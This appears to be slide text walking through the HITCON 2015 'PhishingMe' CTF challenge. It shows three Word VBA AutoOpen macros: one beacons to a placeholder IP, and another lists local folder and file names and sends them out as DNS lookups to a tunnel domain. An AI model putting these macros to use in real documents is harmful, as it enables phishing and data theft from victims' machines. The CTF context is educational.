26. HITCON 2015 - PhishingMe(Misc)
• Description
• Sent me a .doc, I will open it if your subject is "HITCON 2015"!
• Find the flag under my file system.
• p.s. I've enabled Macro for you.
• Info
• Point 200
• Solved by 9 (of 969 teams)
30. HITCON 2015 - PhishingMe(Misc)
http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html
Sub AutoOpen()
Dim objHttp: Set objHttp = CreateObject("Microsoft.XMLHTTP")
uri = "http://X.X.X.X/poop/"
objHttp.Open "GET", uri, False
objHttp.send
End Sub
31. HITCON 2015 - PhishingMe(Misc)
http://ctfhacker.com/ctf/phishing/2015/10/19/hitcon-phishingme.html
Sub AutoOpen()
Dim objShell: Set objShell = CreateObject("WScript.Shell")
objShell.Exec ("%comspec% /c nslookup tun.mydomain.com")
End Sub
32. HITCON 2015 - PhishingMe(Misc)
Sub AutoOpen()
Dim objShell: Set objShell = CreateObject("WScript.Shell")
Dim objFSO: Set objFSO = CreateObject("Scripting.FileSystemObject")
Dim objFolder: Set objFolder = objFSO.GetFolder(".")
objShell.Exec ("%comspec% /c nslookup " & objFolder.Path & ".tun.mydomain.com")
Set colFiles = objFolder.Files
buff = ""
For Each objFile In colFiles
buff = Replace(objFile.Name, " ", "_")
buff = Replace(buff, ".", "_")
objShell.Exec ("%comspec% /c nslookup " & buff & ".tun.mydomain.com")
Next
End Sub